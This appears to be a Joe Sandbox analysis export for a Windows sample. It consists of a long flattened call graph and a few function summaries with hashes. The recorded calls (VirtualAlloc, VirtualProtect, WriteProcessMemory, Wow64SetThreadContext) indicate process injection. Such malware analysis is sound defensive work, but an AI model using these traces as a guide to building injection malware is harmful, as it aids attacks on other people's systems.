7ac896 VirtualFree 28523->28524 28525 7ac8ba 28524->28525 28525->27783 28527 7ab489 VirtualAlloc 28526->28527 28529 7ab53a 28527->28529 28532 7ab55f 28527->28532 28530 7ab54b 8 API calls 28529->28530 28531 7ab540 28530->28531 28533 7ab568 7 API calls 28531->28533 28534 7ab909 28532->28534 28539 7ac1d6 28532->28539 28533->28532 29747 7ab9b3 6 API calls 28534->29747 28540 7ac896 VirtualFree 28539->28540 28541 7ac8ba 28540->28541 28541->27783 28543 7b2836 VirtualProtect 28542->28543 28545 7b2907 28543->28545 28549 7b294d VirtualProtect 28543->28549 29748 7b2923 VirtualProtect 28545->29748 28550 7b29f8 28549->28550 28552 7ac88a VirtualFree 28551->28552 28554 7ac8ba 28552->28554 28554->27783 28558 7ef74e 28555->28558 28559 7ef990 9 API calls 28558->28559 28565 7ef774 WriteProcessMemory 28558->28565 28559->28565 28560 7efed9 28561 7efefe 28560->28561 28562 7f080b 28560->28562 29752 7effad 8 API calls 28561->29752 29753 7f0823 8 API calls 28562->29753 28566 7efab9 28565->28566 28572 7efabe 28565->28572 28569 7effa6 28578 7efd93 28572->28578 28581 7efbf4 28572->28581 29749 7efcca 8 API calls 28572->29749 28578->28581 29750 7efc6b 8 API calls 28578->29750 28581->28560 29751 7efed3 8 API calls 28581->29751 28585 7a5d91 VirtualProtect 28584->28585 28587 7a5dfc 28585->28587 28589 7fa3c1 28588->28589 28590 7fa3ec VirtualProtect 28589->28590 28591 7fa42c 28590->28591 28596 80f2f6 28592->28596 28598 80f307 28592->28598 28593 80f671 2 API calls 28594 80f667 28593->28594 28597 80fdd3 VirtualProtect 28594->28597 28595 80f521 3 API calls 28595->28596 28596->28593 28596->28594 28599 80fdf4 28597->28599 28598->28595 28598->28596 28599->27783 28601 7ac54a VirtualFree 28600->28601 28603 7ac8ba 28601->28603 28603->27783 28605 7f176d Wow64SetThreadContext 28604->28605 28620 7f17ae 28604->28620 28621 7f2318 28605->28621 28606 7f1beb 29754 7f1c53 Wow64SetThreadContext Wow64SetThreadContext 28606->29754 28609 7f1b75 4 API calls 28610 7f1b6b 28609->28610 28610->28606 28611 7f1baa 28610->28611 
28615 7f1bc4 Wow64SetThreadContext 28611->28615 28614 7f180e 28614->28606 28614->28609 28615->28605 28617 7f19c3 5 API calls 28617->28620 28620->28614 28620->28617 28623 7aae56 28622->28623 28624 7ab4c6 VirtualAlloc 28623->28624 28625 7ab53a 28624->28625 28628 7ab55f 28624->28628 28626 7ab54b 8 API calls 28625->28626 28627 7ab540 28626->28627 28629 7ab568 7 API calls 28627->28629 28630 7ab909 28628->28630 28635 7ac1d6 28628->28635 28629->28628 29755 7ab9b3 6 API calls 28630->29755 28636 7ac896 VirtualFree 28635->28636 28637 7ac8ba 28636->28637 28637->27783 28639 7c8a6d VirtualProtect 28638->28639 28641 7c8cff 28639->28641 28643 7ab8ca 28642->28643 28644 7ab909 28643->28644 28649 7ac1d6 28643->28649 29756 7ab9b3 6 API calls 28644->29756 28650 7ac896 VirtualFree 28649->28650 28651 7ac8ba 28650->28651 28651->27783 28653 7c8972 VirtualProtect 28652->28653 28655 7c8cff 28653->28655 28659 7ac155 28656->28659 28657 7ac896 VirtualFree 28658 7ac8ba 28657->28658 28658->27783 28659->28657 28663 7ac155 28660->28663 28661 7ac896 VirtualFree 28662 7ac8ba 28661->28662 28662->27783 28663->28661 28665 7a7770 LoadLibraryW 28664->28665 28667 7a7799 LoadLibraryW 28665->28667 28668 7a77b6 28665->28668 28667->28668 28671 7a8488 28668->28671 28673 7a7bbb 28668->28673 28669 7a913d 29758 7a91f1 22 API calls 28669->29758 28671->28669 28682 7a9a0a 28671->28682 29757 7a8055 22 API calls 28673->29757 28678 7a804b 28683 7aadd5 28682->28683 28684 7aa5c7 22 API calls 28682->28684 28683->27783 28685 7aa5bd 28684->28685 28687 7ab568 7 API calls 28686->28687 28688 7ab55f 28686->28688 28687->28688 28689 7ab909 28688->28689 28694 7ac1d6 28688->28694 29759 7ab9b3 6 API calls 28689->29759 28695 7ac896 VirtualFree 28694->28695 28696 7ac8ba 28695->28696 28696->27783 28698 7c8570 28697->28698 28699 7c858e VirtualProtect 28698->28699 28702 7c8586 28698->28702 28699->28702 28700 7c8cbd VirtualProtect 28701 7c8cff 28700->28701 28702->28700 28704 7a596b 28703->28704 28705 7a5d9d VirtualProtect 28704->28705 
28706 7a5dfc 28705->28706 28708 7a5603 28707->28708 28709 7a5610 28708->28709 28714 7a56de 28708->28714 29760 7a5625 VirtualProtect 28709->29760 28715 7a5d9d VirtualProtect 28714->28715 28716 7a5dfc 28715->28716 28718 7b2767 3 API calls 28717->28718 28719 7b270d 28718->28719 28720 7b2756 3 API calls 28719->28720 28721 7b274b VirtualProtect 28719->28721 28720->28721 28723 7b294d VirtualProtect 28721->28723 28724 7b2907 28721->28724 28728 7b29f8 28723->28728 29761 7b2923 VirtualProtect 28724->29761 28730 7a777c LoadLibraryW 28729->28730 28732 7a6c19 28729->28732 28731 7a7799 LoadLibraryW 28730->28731 28733 7a77b6 28730->28733 28731->28733 28732->28730 28734 7a8488 28733->28734 28738 7a7bbb 28733->28738 28735 7a913d 28734->28735 28747 7a9a0a 28734->28747 29763 7a91f1 22 API calls 28735->29763 29762 7a8055 22 API calls 28738->29762 28743 7a804b 28748 7aadd5 28747->28748 28749 7aa5c7 22 API calls 28747->28749 28748->27783 28750 7aa5bd 28749->28750 28752 7c84da 28751->28752 28753 7c84e7 28752->28753 28756 7c85b5 28752->28756 28754 7c8553 2 API calls 28753->28754 28755 7c854b 28754->28755 28757 7c8cbd VirtualProtect 28756->28757 28758 7c8cff 28757->28758 28760 7a5257 VirtualProtect 28759->28760 28762 7a5dfc 28760->28762 28764 7ab664 28763->28764 28765 7ab909 28764->28765 28770 7ac1d6 28764->28770 29764 7ab9b3 6 API calls 28765->29764 28771 7ac896 VirtualFree 28770->28771 28772 7ac8ba 28771->28772 28772->27783 28774 80fdd3 VirtualProtect 28773->28774 28775 80fdf4 28774->28775 28775->27783 28777 7ac261 VirtualFree 28776->28777 28779 7ac8ba 28777->28779 28779->27783 28783 7a5699 28780->28783 28781 7a5d9d VirtualProtect 28782 7a5dfc 28781->28782 28783->28781 28785 7f22a1 Wow64SetThreadContext 28784->28785 28787 7f2318 28785->28787 28790 7f1f7c 28788->28790 28791 7f225c Wow64SetThreadContext 28790->28791 28792 7f1fdd Wow64SetThreadContext 28790->28792 28791->28792 28793 7f2318 28792->28793 28795 7ac56c VirtualFree 28794->28795 28797 7ac8ba 28795->28797 28797->27783 28801 
7ab68b 28798->28801 28799 7ab909 29765 7ab9b3 6 API calls 28799->29765 28801->28799 28803 7ac1d6 28801->28803 28806 7ac896 VirtualFree 28803->28806 28807 7ac8ba 28806->28807 28807->27783 28809 7b270d 28808->28809 28810 7b2756 3 API calls 28809->28810 28811 7b274b VirtualProtect 28809->28811 28810->28811 28813 7b294d VirtualProtect 28811->28813 28814 7b2907 28811->28814 28818 7b29f8 28813->28818 29766 7b2923 VirtualProtect 28814->29766 28820 7a777c LoadLibraryW 28819->28820 28821 7a7799 LoadLibraryW 28820->28821 28822 7a77b6 28820->28822 28821->28822 28825 7a8488 28822->28825 28827 7a7bbb 28822->28827 28823 7a913d 29768 7a91f1 22 API calls 28823->29768 28825->28823 28836 7a9a0a 28825->28836 29767 7a8055 22 API calls 28827->29767 28832 7a804b 28837 7aadd5 28836->28837 28838 7aa5c7 22 API calls 28836->28838 28837->27783 28839 7aa5bd 28838->28839 28841 7abd83 28840->28841 28842 7abdc4 28840->28842 28843 7ac896 VirtualFree 28841->28843 28844 7abde3 5 API calls 28842->28844 28845 7ac8ba 28843->28845 28849 7abddb 28844->28849 28845->27783 28846 7ac108 28847 7ac117 2 API calls 28846->28847 28848 7ac10e 28847->28848 28850 7ac02a 4 API calls 28849->28850 28851 7abe24 28849->28851 28850->28851 28851->28841 28851->28846 28853 7c806b VirtualProtect 28852->28853 28855 7c8cff 28853->28855 28857 7ab489 VirtualAlloc 28856->28857 28859 7ab53a 28857->28859 28862 7ab55f 28857->28862 28860 7ab54b 8 API calls 28859->28860 28861 7ab540 28860->28861 28863 7ab568 7 API calls 28861->28863 28864 7ab909 28862->28864 28869 7ac1d6 28862->28869 28863->28862 29769 7ab9b3 6 API calls 28864->29769 28870 7ac896 VirtualFree 28869->28870 28871 7ac8ba 28870->28871 28871->27783 28873 7aa9c3 28872->28873 28875 7aa982 VirtualAlloc 28872->28875 29770 7aa9df 10 API calls 28873->29770 28877 7ab53a 28875->28877 28880 7ab55f 28875->28880 28878 7ab54b 8 API calls 28877->28878 28879 7ab540 28878->28879 28881 7ab568 7 API calls 28879->28881 28882 7ab909 28880->28882 28887 7ac1d6 28880->28887 28881->28880 29771 
7ab9b3 6 API calls 28882->29771 28888 7ac896 VirtualFree 28887->28888 28889 7ac8ba 28888->28889 28889->27783 28894 7c82b3 28890->28894 28891 7c84e7 28892 7c8553 2 API calls 28891->28892 28893 7c854b 28892->28893 28894->28891 28895 7c85b5 28894->28895 28896 7c8cbd VirtualProtect 28895->28896 28897 7c8cff 28896->28897 28899 7b229e 28898->28899 28907 7b228f 28898->28907 28900 7b22de 13 API calls 28899->28900 28900->28907 28902 7b294d VirtualProtect 28909 7b29f8 28902->28909 28903 7b2907 29772 7b2923 VirtualProtect 28903->29772 28908 7b2756 5 API calls 28907->28908 28910 7b25c5 VirtualProtect 28907->28910 28908->28910 28910->28902 28910->28903 28912 7ab580 28911->28912 28913 7ab909 28912->28913 28918 7ac1d6 28912->28918 29773 7ab9b3 6 API calls 28913->29773 28919 7ac896 VirtualFree 28918->28919 28920 7ac8ba 28919->28920 28920->27783 28922 7ac88a VirtualFree 28921->28922 28924 7ac8ba 28922->28924 28924->27783 28926 7efa82 WriteProcessMemory 28925->28926 28935 7efab9 28926->28935 28939 7efabe 28926->28939 28928 7efed9 28929 7efefe 28928->28929 28930 7f080b 28928->28930 29777 7effad 8 API calls 28929->29777 29778 7f0823 8 API calls 28930->29778 28936 7effa6 28942 7efd93 28939->28942 28947 7efbf4 28939->28947 29774 7efcca 8 API calls 28939->29774 28942->28947 29775 7efc6b 8 API calls 28942->29775 28947->28928 29776 7efed3 8 API calls 28947->29776 28952 7c8a91 28951->28952 28952->28951 28953 7c8cbd VirtualProtect 28952->28953 28954 7c8cff 28953->28954 28956 7c8972 VirtualProtect 28955->28956 28958 7c8cff 28956->28958 28965 7ab68b 28959->28965 28960 7ab909 29779 7ab9b3 6 API calls 28960->29779 28965->28960 28966 7ac1d6 28965->28966 28967 7ac896 VirtualFree 28966->28967 28968 7ac8ba 28967->28968 28968->27783 28970 7c82b3 28969->28970 28971 7c84e7 28970->28971 28974 7c85b5 28970->28974 28972 7c8553 2 API calls 28971->28972 28973 7c854b 28972->28973 28975 7c8cbd VirtualProtect 28974->28975 28976 7c8cff 28975->28976 28978 7a5d91 VirtualProtect 28977->28978 28980 7a5dfc 
28978->28980 28982 7de232 28981->28982 28983 7de81a VirtualProtect 28982->28983 28984 7de847 28983->28984 28986 7bd182 VirtualProtect 28985->28986 28988 7bd1ed 28986->28988 28992 7ac177 28989->28992 28990 7ac896 VirtualFree 28991 7ac8ba 28990->28991 28991->27783 28992->28990 28994 7f1ba6 28993->28994 28995 7f1beb 28994->28995 28996 7f1baa 28994->28996 29780 7f1c53 Wow64SetThreadContext Wow64SetThreadContext 28995->29780 28998 7f1bc4 Wow64SetThreadContext 28996->28998 28999 7f1bbd Wow64SetThreadContext 28998->28999 29006 7f2318 28999->29006 29008 7c82b3 29007->29008 29009 7c84e7 29008->29009 29012 7c85b5 29008->29012 29010 7c8553 2 API calls 29009->29010 29011 7c854b 29010->29011 29013 7c8cbd VirtualProtect 29012->29013 29014 7c8cff 29013->29014 29016 7de182 29015->29016 29017 7de81a VirtualProtect 29016->29017 29018 7de847 29017->29018 29020 7b23f8 11 API calls 29019->29020 29027 7b23f1 29019->29027 29020->29027 29022 7b294d VirtualProtect 29029 7b29f8 29022->29029 29023 7b2907 29781 7b2923 VirtualProtect 29023->29781 29028 7b2756 5 API calls 29027->29028 29030 7b25c5 VirtualProtect 29027->29030 29028->29030 29030->29022 29030->29023 29032 7c86a6 VirtualProtect 29031->29032 29034 7c8cff 29032->29034 29037 7c8a6d VirtualProtect 29035->29037 29038 7c8cff 29037->29038 29040 7c8931 VirtualProtect 29039->29040 29042 7c8cff 29040->29042 29046 7aba92 29043->29046 29044 7ac896 VirtualFree 29047 7ac8ba 29044->29047 29045 7abde3 5 API calls 29051 7abddb 29045->29051 29046->29045 29054 7abd83 29046->29054 29047->27783 29048 7ac108 29049 7ac117 2 API calls 29048->29049 29050 7ac10e 29049->29050 29052 7ac02a 4 API calls 29051->29052 29053 7abe24 29051->29053 29052->29053 29053->29048 29053->29054 29054->29044 29056 7ac58d VirtualFree 29055->29056 29058 7ac8ba 29056->29058 29058->27783 29060 7ab587 29059->29060 29061 7ab909 29060->29061 29066 7ac1d6 29060->29066 29782 7ab9b3 6 API calls 29061->29782 29067 7ac896 VirtualFree 29066->29067 29068 7ac8ba 29067->29068 29068->27783 
29070 7c8900 VirtualProtect 29069->29070 29072 7c8cff 29070->29072 29074 7b27ff VirtualProtect 29073->29074 29076 7b294d VirtualProtect 29074->29076 29077 7b2907 29074->29077 29081 7b29f8 29076->29081 29783 7b2923 VirtualProtect 29077->29783 29083 7aa687 29082->29083 29084 7aa691 29083->29084 29085 7aa6c0 20 API calls 29083->29085 29086 7aa96f 12 API calls 29084->29086 29085->29084 29087 7aa965 29086->29087 29089 7aa982 VirtualAlloc 29087->29089 29784 7aa9df 10 API calls 29087->29784 29091 7ab53a 29089->29091 29094 7ab55f 29089->29094 29092 7ab54b 8 API calls 29091->29092 29093 7ab540 29092->29093 29095 7ab568 7 API calls 29093->29095 29096 7ab909 29094->29096 29101 7ac1d6 29094->29101 29095->29094 29785 7ab9b3 6 API calls 29096->29785 29102 7ac896 VirtualFree 29101->29102 29103 7ac8ba 29102->29103 29103->27783 29110 7ab68b 29104->29110 29105 7ab909 29786 7ab9b3 6 API calls 29105->29786 29110->29105 29111 7ac1d6 29110->29111 29112 7ac896 VirtualFree 29111->29112 29113 7ac8ba 29112->29113 29113->27783 29115 7ac584 VirtualFree 29114->29115 29117 7ac8ba 29115->29117 29117->27783 29119 7ac4a4 VirtualFree 29118->29119 29121 7ac8ba 29119->29121 29121->27783 29123 7ac0bd 29122->29123 29124 7ac108 29123->29124 29127 7ac1d6 29123->29127 29125 7ac117 2 API calls 29124->29125 29126 7ac10e 29125->29126 29128 7ac896 VirtualFree 29127->29128 29129 7ac8ba 29128->29129 29129->27783 29131 7f178d Wow64SetThreadContext 29130->29131 29133 7f2318 29131->29133 29135 7c8ca0 VirtualProtect 29134->29135 29137 7c8cff 29135->29137 29139 80f68e 29138->29139 29140 80f6a6 VirtualProtect 29139->29140 29141 80f69c 29139->29141 29140->29141 29141->27783 29142 80fdd3 VirtualProtect 29141->29142 29143 80fdf4 29142->29143 29143->27783 29145 7ab79b 29144->29145 29146 7ab909 29145->29146 29147 7ac1d6 29145->29147 29787 7ab9b3 6 API calls 29146->29787 29152 7ac896 VirtualFree 29147->29152 29153 7ac8ba 29152->29153 29153->27783 29155 7aa99b VirtualAlloc 29154->29155 29157 7ab53a 29155->29157 29160 7ab55f 
29155->29160 29158 7ab54b 8 API calls 29157->29158 29159 7ab540 29158->29159 29161 7ab568 7 API calls 29159->29161 29162 7ab909 29160->29162 29165 7ac1d6 29160->29165 29161->29160 29788 7ab9b3 6 API calls 29162->29788 29168 7ac896 VirtualFree 29165->29168 29169 7ac8ba 29168->29169 29169->27783 29171 7ef9d3 WriteProcessMemory 29170->29171 29184 7efabe 29171->29184 29188 7efab9 29171->29188 29174 7efed9 29175 7efefe 29174->29175 29176 7f080b 29174->29176 29792 7effad 8 API calls 29175->29792 29793 7f0823 8 API calls 29176->29793 29181 7effa6 29190 7efbf4 29184->29190 29194 7efd93 29184->29194 29789 7efcca 8 API calls 29184->29789 29190->29174 29791 7efed3 8 API calls 29190->29791 29194->29190 29790 7efc6b 8 API calls 29194->29790 29198 7ab69c 29197->29198 29199 7ab909 29198->29199 29204 7ac1d6 29198->29204 29794 7ab9b3 6 API calls 29199->29794 29205 7ac896 VirtualFree 29204->29205 29206 7ac8ba 29205->29206 29206->27783 29208 7a7770 LoadLibraryW 29207->29208 29210 7a7799 LoadLibraryW 29208->29210 29211 7a77b6 29208->29211 29210->29211 29214 7a8488 29211->29214 29216 7a7bbb 29211->29216 29212 7a913d 29796 7a91f1 22 API calls 29212->29796 29214->29212 29225 7a9a0a 29214->29225 29795 7a8055 22 API calls 29216->29795 29221 7a804b 29226 7aa5c7 22 API calls 29225->29226 29227 7aadd5 29225->29227 29228 7aa5bd 29226->29228 29227->27783 29236 7f13a0 29229->29236 29230 7f1467 29231 7f1746 6 API calls 29230->29231 29249 7f173c 29231->29249 29232 7f1beb 29797 7f1c53 Wow64SetThreadContext Wow64SetThreadContext 29232->29797 29235 7f1b75 4 API calls 29237 7f1b6b 29235->29237 29236->29230 29238 7f16b2 7 API calls 29236->29238 29237->29232 29239 7f1baa 29237->29239 29238->29236 29242 7f1bc4 Wow64SetThreadContext 29239->29242 29245 7f176d Wow64SetThreadContext 29242->29245 29244 7f19c3 5 API calls 29244->29249 29250 7f2318 29245->29250 29246 7f180e 29246->29232 29246->29235 29249->29244 29249->29245 29249->29246 29252 7c8a6d VirtualProtect 29251->29252 29254 7c8cff 29252->29254 29256 
7aaea5 29255->29256 29257 7ab4c6 VirtualAlloc 29256->29257 29258 7ab53a 29257->29258 29261 7ab55f 29257->29261 29259 7ab54b 8 API calls 29258->29259 29260 7ab540 29259->29260 29262 7ab568 7 API calls 29260->29262 29263 7ab909 29261->29263 29268 7ac1d6 29261->29268 29262->29261 29798 7ab9b3 6 API calls 29263->29798 29269 7ac896 VirtualFree 29268->29269 29270 7ac8ba 29269->29270 29270->27783 29272 7fa3c1 29271->29272 29273 7fa3ec VirtualProtect 29272->29273 29274 7fa42c 29273->29274 29276 7aaea5 29275->29276 29277 7ab4c6 VirtualAlloc 29276->29277 29278 7ab53a 29277->29278 29281 7ab55f 29277->29281 29279 7ab54b 8 API calls 29278->29279 29280 7ab540 29279->29280 29282 7ab568 7 API calls 29280->29282 29283 7ab909 29281->29283 29288 7ac1d6 29281->29288 29282->29281 29799 7ab9b3 6 API calls 29283->29799 29289 7ac896 VirtualFree 29288->29289 29290 7ac8ba 29289->29290 29290->27783 29292 7ab4a9 VirtualAlloc 29291->29292 29294 7ab53a 29292->29294 29297 7ab55f 29292->29297 29295 7ab54b 8 API calls 29294->29295 29296 7ab540 29295->29296 29298 7ab568 7 API calls 29296->29298 29299 7ab909 29297->29299 29304 7ac1d6 29297->29304 29298->29297 29800 7ab9b3 6 API calls 29299->29800 29305 7ac896 VirtualFree 29304->29305 29306 7ac8ba 29305->29306 29306->27783 29308 7c81d8 29307->29308 29309 7c84e7 29308->29309 29312 7c85b5 29308->29312 29310 7c8553 2 API calls 29309->29310 29311 7c854b 29310->29311 29313 7c8cbd VirtualProtect 29312->29313 29314 7c8cff 29313->29314 29317 7b26af 29315->29317 29316 7b274b VirtualProtect 29320 7b294d VirtualProtect 29316->29320 29321 7b2907 29316->29321 29317->29316 29319 7b2756 5 API calls 29317->29319 29319->29316 29325 7b29f8 29320->29325 29801 7b2923 VirtualProtect 29321->29801 29327 7ac4a4 VirtualFree 29326->29327 29329 7ac8ba 29327->29329 29329->27783 29331 7ab120 VirtualAlloc 29330->29331 29333 7ab53a 29331->29333 29336 7ab55f 29331->29336 29334 7ab54b 8 API calls 29333->29334 29335 7ab540 29334->29335 29337 7ab568 7 API calls 29335->29337 29338 
7ab909 29336->29338 29343 7ac1d6 29336->29343 29337->29336 29802 7ab9b3 6 API calls 29338->29802 29344 7ac896 VirtualFree 29343->29344 29345 7ac8ba 29344->29345 29345->27783 29347 7abcc6 6 API calls 29346->29347 29352 7abb09 29346->29352 29347->29352 29348 7abd83 29349 7ac896 VirtualFree 29348->29349 29351 7ac8ba 29349->29351 29350 7abde3 5 API calls 29353 7abddb 29350->29353 29351->27783 29352->29348 29352->29350 29357 7abe24 29353->29357 29358 7ac02a 4 API calls 29353->29358 29354 7ac108 29355 7ac117 2 API calls 29354->29355 29356 7ac10e 29355->29356 29357->29348 29357->29354 29358->29357 29360 7aa947 29359->29360 29361 7aa96f 12 API calls 29360->29361 29362 7aa965 29361->29362 29364 7aa982 VirtualAlloc 29362->29364 29803 7aa9df 10 API calls 29362->29803 29366 7ab53a 29364->29366 29369 7ab55f 29364->29369 29367 7ab54b 8 API calls 29366->29367 29368 7ab540 29367->29368 29370 7ab568 7 API calls 29368->29370 29371 7ab909 29369->29371 29376 7ac1d6 29369->29376 29370->29369 29804 7ab9b3 6 API calls 29371->29804 29377 7ac896 VirtualFree 29376->29377 29378 7ac8ba 29377->29378 29378->27783 29380 7c8cd3 VirtualProtect 29379->29380 29381 7c8cff 29380->29381 29383 7a57ce 29382->29383 29384 7a5d9d VirtualProtect 29383->29384 29385 7a5dfc 29384->29385 29387 7b270d 29386->29387 29388 7b274b VirtualProtect 29387->29388 29389 7b2756 5 API calls 29387->29389 29391 7b294d VirtualProtect 29388->29391 29392 7b2907 29388->29392 29389->29388 29396 7b29f8 29391->29396 29805 7b2923 VirtualProtect 29392->29805 29398 7ab4c6 VirtualAlloc 29397->29398 29399 7ab53a 29398->29399 29402 7ab55f 29398->29402 29400 7ab54b 8 API calls 29399->29400 29401 7ab540 29400->29401 29403 7ab568 7 API calls 29401->29403 29404 7ab909 29402->29404 29409 7ac1d6 29402->29409 29403->29402 29806 7ab9b3 6 API calls 29404->29806 29410 7ac896 VirtualFree 29409->29410 29411 7ac8ba 29410->29411 29411->27783 29413 7a5603 29412->29413 29414 7a5610 29413->29414 29419 7a56de 29413->29419 29807 7a5625 VirtualProtect 
29414->29807 29420 7a5d9d VirtualProtect 29419->29420 29421 7a5dfc 29420->29421 29423 7c82d7 29422->29423 29423->29422 29424 7c84e7 29423->29424 29427 7c85b5 29423->29427 29425 7c8553 2 API calls 29424->29425 29426 7c854b 29425->29426 29428 7c8cbd VirtualProtect 29427->29428 29429 7c8cff 29428->29429 29432 7bd044 29430->29432 29431 7bd08a 29432->29431 29433 7bd1bf VirtualProtect 29432->29433 29434 7bd1ed 29433->29434 29438 7ac038 29435->29438 29436 7ac08c 3 API calls 29436->29438 29437 7ac05e 29439 7ac108 29437->29439 29442 7ac1d6 29437->29442 29438->29436 29438->29437 29440 7ac117 2 API calls 29439->29440 29441 7ac10e 29440->29441 29443 7ac896 VirtualFree 29442->29443 29444 7ac8ba 29443->29444 29444->27783 29446 7f1732 29445->29446 29447 7f1746 6 API calls 29446->29447 29463 7f173c 29447->29463 29448 7f176d Wow64SetThreadContext 29464 7f2318 29448->29464 29449 7f1beb 29808 7f1c53 Wow64SetThreadContext Wow64SetThreadContext 29449->29808 29452 7f1b75 4 API calls 29453 7f1b6b 29452->29453 29453->29449 29454 7f1baa 29453->29454 29458 7f1bc4 Wow64SetThreadContext 29454->29458 29457 7f180e 29457->29449 29457->29452 29458->29448 29460 7f19c3 5 API calls 29460->29463 29463->29448 29463->29457 29463->29460 29466 7c8cbd VirtualProtect 29465->29466 29467 7c8cff 29466->29467 29469 7c8cbd VirtualProtect 29468->29469 29470 7c8cff 29469->29470 29472 7bd1bf VirtualProtect 29471->29472 29473 7bd1ed 29472->29473 29475 7c80e2 VirtualProtect 29474->29475 29477 7c8cff 29475->29477 29479 7c8c94 VirtualProtect 29478->29479 29481 7c8cff 29479->29481 29483 7ab6bc 29482->29483 29484 7ab909 29483->29484 29489 7ac1d6 29483->29489 29809 7ab9b3 6 API calls 29484->29809 29490 7ac896 VirtualFree 29489->29490 29491 7ac8ba 29490->29491 29491->27783 29493 7c88e6 29492->29493 29494 7c88f6 VirtualProtect 29492->29494 29493->29494 29496 7c86c1 29493->29496 29499 7c8cff 29494->29499 29497 7c8880 VirtualProtect 29496->29497 29498 7c8876 29497->29498 29507 7b2533 29500->29507 29502 7b294d VirtualProtect 
29509 7b29f8 29502->29509 29503 7b2907 29810 7b2923 VirtualProtect 29503->29810 29508 7b2756 5 API calls 29507->29508 29510 7b25c5 VirtualProtect 29507->29510 29508->29510 29510->29502 29510->29503 29512 7aa687 29511->29512 29513 7aa691 29512->29513 29514 7aa6c0 20 API calls 29512->29514 29515 7aa96f 12 API calls 29513->29515 29514->29513 29516 7aa965 29515->29516 29518 7aa982 VirtualAlloc 29516->29518 29811 7aa9df 10 API calls 29516->29811 29520 7ab53a 29518->29520 29523 7ab55f 29518->29523 29521 7ab54b 8 API calls 29520->29521 29522 7ab540 29521->29522 29524 7ab568 7 API calls 29522->29524 29525 7ab909 29523->29525 29530 7ac1d6 29523->29530 29524->29523 29812 7ab9b3 6 API calls 29525->29812 29531 7ac896 VirtualFree 29530->29531 29532 7ac8ba 29531->29532 29532->27783 29534 7ac521 VirtualFree 29533->29534 29536 7ac8ba 29534->29536 29536->27783 29538 7abd48 29537->29538 29540 7abde3 5 API calls 29538->29540 29548 7abd83 29538->29548 29539 7ac896 VirtualFree 29541 7ac8ba 29539->29541 29545 7abddb 29540->29545 29541->27783 29542 7ac108 29543 7ac117 2 API calls 29542->29543 29544 7ac10e 29543->29544 29546 7ac02a 4 API calls 29545->29546 29547 7abe24 29545->29547 29546->29547 29547->29542 29547->29548 29548->29539 29550 7f1959 29549->29550 29550->29549 29551 7f19c3 4 API calls 29550->29551 29552 7f1a13 29550->29552 29551->29550 29553 7f1beb 29552->29553 29555 7f1b75 4 API calls 29552->29555 29813 7f1c53 Wow64SetThreadContext Wow64SetThreadContext 29553->29813 29556 7f1b6b 29555->29556 29556->29553 29557 7f1baa 29556->29557 29559 7f1bc4 Wow64SetThreadContext 29557->29559 29561 7f1bbd Wow64SetThreadContext 29559->29561 29566 7f2318 29561->29566 29568 7f22eb Wow64SetThreadContext 29567->29568 29569 7f2318 29568->29569 29571 7a5603 29570->29571 29572 7a5610 29571->29572 29577 7a56de 29571->29577 29814 7a5625 VirtualProtect 29572->29814 29578 7a5d9d VirtualProtect 29577->29578 29579 7a5dfc 29578->29579 29581 7a51bb VirtualProtect 29580->29581 29583 7a5dfc 29581->29583 29585 
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: A$E$F$L$L$P$V$V$W$a$a$a$a$b$c$c$d$e$e$e$i$i$i$i$l$l$l$l$o$o$o$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y
                                    • API String ID: 1029625771-2526299333
                                    • Opcode ID: 8c3d988e9a67ed8fee7b140b24425a86b54a01020a060741ae632ad1be85c51e
                                    • Instruction ID: 4154316272c1b74ef57b097dcd6a65b036a90ecaf40d39e32166d91283532bb9
                                    • Opcode Fuzzy Hash: 8c3d988e9a67ed8fee7b140b24425a86b54a01020a060741ae632ad1be85c51e
                                    • Instruction Fuzzy Hash: D422B561D096A88AF7218B24CC447AABB75EF92304F0481F9D44CA7282D67E5FD5CF62

                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 007EFAAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: A$D$E$OP=6$P$P$S$b$c$c$c$e$e$e$e$g$i$i$o$o$o$p$r$r$s$s$s$s$t$t$t$u$v$x
                                    • API String ID: 3559483778-1785805788
                                    • Opcode ID: 91f3712596a6694e812837967e646db4ef824f0782312ae84fa6a800b9c0e4ca
                                    • Instruction ID: 81495f418581a44c8f6e699d42e92f4481a892a8c409ba750356cd24b16dbf66
                                    • Opcode Fuzzy Hash: 91f3712596a6694e812837967e646db4ef824f0782312ae84fa6a800b9c0e4ca
                                    • Instruction Fuzzy Hash: 2D12BEB1E052A88AEB24CB15CC84BEABBB5AF99304F1441EAC40D67781D67D5FC1CF51

                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$L$L$OP=6$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                    • API String ID: 983334009-205251571
                                    • Opcode ID: 12a1dc460291a7c7a91e330d57197651433e2a2924f89a8654363eb5aa09630b
                                    • Instruction ID: 60be3d6e55498047663ee6abf055955690aa4d7bcf6ea8b3dd3aefd844d71c60
                                    • Opcode Fuzzy Hash: 12a1dc460291a7c7a91e330d57197651433e2a2924f89a8654363eb5aa09630b
                                    • Instruction Fuzzy Hash: 1ED1D2B2D091A8DAEB208A24DC48BEABB75AF81314F4540F9D44C67281D7BD5FC5CF62

                                    Strings
                                    Memory Dump Source
